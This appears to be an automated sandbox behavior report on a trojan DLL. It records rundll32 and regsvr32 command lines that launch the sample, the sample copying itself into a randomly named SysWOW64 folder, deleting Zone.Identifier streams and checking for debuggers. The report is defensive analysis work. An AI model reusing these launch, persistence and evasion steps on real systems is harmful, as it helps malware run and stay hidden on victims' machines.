Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485F0E9	5_2_0485F0E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04873EE9	5_2_04873EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486BEFD	5_2_0486BEFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04868806	5_2_04868806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04869A01	5_2_04869A01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485B820	5_2_0485B820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04853431	5_2_04853431
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04864244	5_2_04864244
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485E640	5_2_0485E640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486F840	5_2_0486F840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04857442	5_2_04857442
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04862E5D	5_2_04862E5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04870A64	5_2_04870A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04873263	5_2_04873263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486A474	5_2_0486A474
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485A871	5_2_0485A871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486DC71	5_2_0486DC71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04857E79	5_2_04857E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04857078	5_2_04857078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486567B	5_2_0486567B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04860F86	5_2_04860F86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04866187	5_2_04866187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04863D85	5_2_04863D85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485238C	5_2_0485238C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485FB8E	5_2_0485FB8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04852194	5_2_04852194
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048577A3	5_2_048577A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04868FAE	5_2_04868FAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048707AA	5_2_048707AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486D1BC	5_2_0486D1BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485BFBE	5_2_0485BFBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048557B8	5_2_048557B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486C5D5	5_2_0486C5D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486FBDE	5_2_0486FBDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485E7DE	5_2_0485E7DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048667E6	5_2_048667E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048607F4	5_2_048607F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04869DF5	5_2_04869DF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04854BFC	5_2_04854BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048555FF	5_2_048555FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486E1F8	5_2_0486E1F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048627F9	5_2_048627F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485EF0C	5_2_0485EF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04872B09	5_2_04872B09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04865515	5_2_04865515
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04865333	5_2_04865333
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04868D3D	5_2_04868D3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04851F38	5_2_04851F38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485D14C	5_2_0485D14C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04872D53	5_2_04872D53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04867D5B	5_2_04867D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485F369	5_2_0485F369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04864F74	5_2_04864F74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04869774	5_2_04869774
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486437A	5_2_0486437A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486017B	5_2_0486017B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04865779	5_2_04865779
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04856B7A	5_2_04856B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E04A66	8_2_04E04A66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFDE74	8_2_04DFDE74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E12009	8_2_04E12009
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF8636	8_2_04DF8636
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E07A0F	8_2_04E07A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFC5D8	8_2_04DFC5D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0EFDD	8_2_04E0EFDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E02142	8_2_04E02142
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0654A	8_2_04E0654A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0FF58	8_2_04E0FF58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF670B	8_2_04DF670B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0AD08	8_2_04E0AD08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0E4E5	8_2_04E0E4E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E13EE9	8_2_04E13EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E100EF	8_2_04E100EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0BEFD	8_2_04E0BEFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF80C0	8_2_04DF80C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0CAD5	8_2_04E0CAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFF0E9	8_2_04DFF0E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0CCD9	8_2_04E0CCD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0D8DB	8_2_04E0D8DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0A2A5	8_2_04E0A2A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E03EAA	8_2_04E03EAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E136AA	8_2_04E136AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E00ABA	8_2_04E00ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E146BD	8_2_04E146BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E00EBC	8_2_04E00EBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFC6B8	8_2_04DFC6B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFBAA9	8_2_04DFBAA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF1CA1	8_2_04DF1CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E13263	8_2_04E13263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E10A64	8_2_04E10A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0DC71	8_2_04E0DC71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0A474	8_2_04E0A474
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFA445	8_2_04DFA445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0567B	8_2_04E0567B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF7442	8_2_04DF7442
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFE640	8_2_04DFE640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0F840	8_2_04E0F840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E04244	8_2_04E04244
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF7E79	8_2_04DF7E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF7078	8_2_04DF7078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFA871	8_2_04DFA871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0B257	8_2_04E0B257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E02E5D	8_2_04E02E5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E09A01	8_2_04E09A01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E08806	8_2_04E08806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF3431	8_2_04DF3431
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFB820	8_2_04DFB820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFE7DE	8_2_04DFE7DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E067E6	8_2_04E067E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E007F4	8_2_04E007F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E09DF5	8_2_04E09DF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0E1F8	8_2_04E0E1F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E027F9	8_2_04E027F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E085FF	8_2_04E085FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF55FF	8_2_04DF55FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF4BFC	8_2_04DF4BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0C5D5	8_2_04E0C5D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0FBDE	8_2_04E0FBDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF2194	8_2_04DF2194
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E107AA	8_2_04E107AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E08FAE	8_2_04E08FAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFFB8E	8_2_04DFFB8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF238C	8_2_04DF238C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0D1BC	8_2_04E0D1BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E117BD	8_2_04E117BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFBFBE	8_2_04DFBFBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E03D85	8_2_04E03D85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E00F86	8_2_04E00F86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF57B8	8_2_04DF57B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E06187	8_2_04E06187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF77A3	8_2_04DF77A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFD14C	8_2_04DFD14C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E04F74	8_2_04E04F74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E09774	8_2_04E09774
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E05779	8_2_04E05779
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0437A	8_2_04E0437A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0017B	8_2_04E0017B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF6B7A	8_2_04DF6B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E12D53	8_2_04E12D53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0E955	8_2_04E0E955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFF369	8_2_04DFF369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E07D5B	8_2_04E07D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFEF0C	8_2_04DFEF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E05333	8_2_04E05333
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E08D3D	8_2_04E08D3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF1F38	8_2_04DF1F38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E12B09	8_2_04E12B09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E05515	8_2_04E05515

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10017BC1 appears 68 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 1001984C appears 48 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10017BC1 appears 68 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 1001984C appears 48 times

Source: M2hsMd9hTq.dll

Binary or memory string: OriginalFilenameUDPTool.EXE: vs M2hsMd9hTq.dll

Source: M2hsMd9hTq.dll

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll	Jump to behavior

Source: M2hsMd9hTq.dll	Virustotal: Detection: 25%
Source: M2hsMd9hTq.dll	ReversingLabs: Detection: 34%

Source: M2hsMd9hTq.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\M2hsMd9hTq.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\M2hsMd9hTq.dll,DllRegisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zxfif\dcctxlgarqbqh.hrz",JFJwcZZNDUCWxQ
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Zxfif\dcctxlgarqbqh.hrz",DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\M2hsMd9hTq.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\M2hsMd9hTq.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zxfif\dcctxlgarqbqh.hrz",JFJwcZZNDUCWxQ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Zxfif\dcctxlgarqbqh.hrz",DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@31/9@0/29

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",#1

Source: C:\Windows\System32\conhost.exe

Mutant created: \BaseNamedObjects\Local\SM0:5500:120:WilError_01

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_100126F9 FindResourceA,LoadResource,LockResource,FreeResource,

3_2_100126F9

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: M2hsMd9hTq.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: M2hsMd9hTq.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: M2hsMd9hTq.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: M2hsMd9hTq.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: M2hsMd9hTq.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10019891 push ecx; ret	3_2_100198A4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10017C60 push ecx; ret	3_2_10017C73
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D1195 push cs; iretd	3_2_040D1197
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10019891 push ecx; ret	4_2_100198A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10017C60 push ecx; ret	4_2_10017C73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05001195 push cs; iretd	4_2_05001197
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04851195 push cs; iretd	5_2_04851197
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DF1195 push cs; iretd	8_2_04DF1197

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_10023A79 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,

3_2_10023A79

Source: M2hsMd9hTq.dll

Static PE information: real checksum: 0x66354 should be: 0x7479d

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\M2hsMd9hTq.dll

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Zxfif\dcctxlgarqbqh.hrz

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Zxfif\dcctxlgarqbqh.hrz:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Jfqipigpage\lfkhkwabjlp.gvp:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000D804 IsIconic,GetWindowPlacement,GetWindowRect,	3_2_1000D804
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10008B90 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	3_2_10008B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000D804 IsIconic,GetWindowPlacement,GetWindowRect,	4_2_1000D804
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10008B90 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	4_2_10008B90

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 2272	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2880	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5916	Thread sleep time: -210000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 4.9 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 4.9 %

Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node			graph_3-21802
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_4-21800

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWX
Source: svchost.exe, 0000000C.00000002.603148618.0000023DBF862000.00000004.00000001.sdmp	Binary or memory string: "@Hyper-V RAWGlobal\BFE_Notify_Event_{165f929e-c666-46f4-ace4-b77cc56f1e7e}LMEM
Source: rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.603130519.0000023DBF84C000.00000004.00000001.sdmp, svchost.exe, 00000021.00000002.587037532.000002A23086B000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.586277347.000002A23086A000.00000004.00000001.sdmp, svchost.exe, 00000021.00000002.587230521.000002A2308E8000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000C.00000002.602838176.0000023DBA029000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW@Q
Source: svchost.exe, 0000000E.00000002.761004522.000002866503E000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000002.761009269.000001F052629000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_1001C49A

Source: C:\Windows\SysWOW64\regsvr32.exe

3_2_10023A79

Source: C:\Windows\SysWOW64\regsvr32.exe

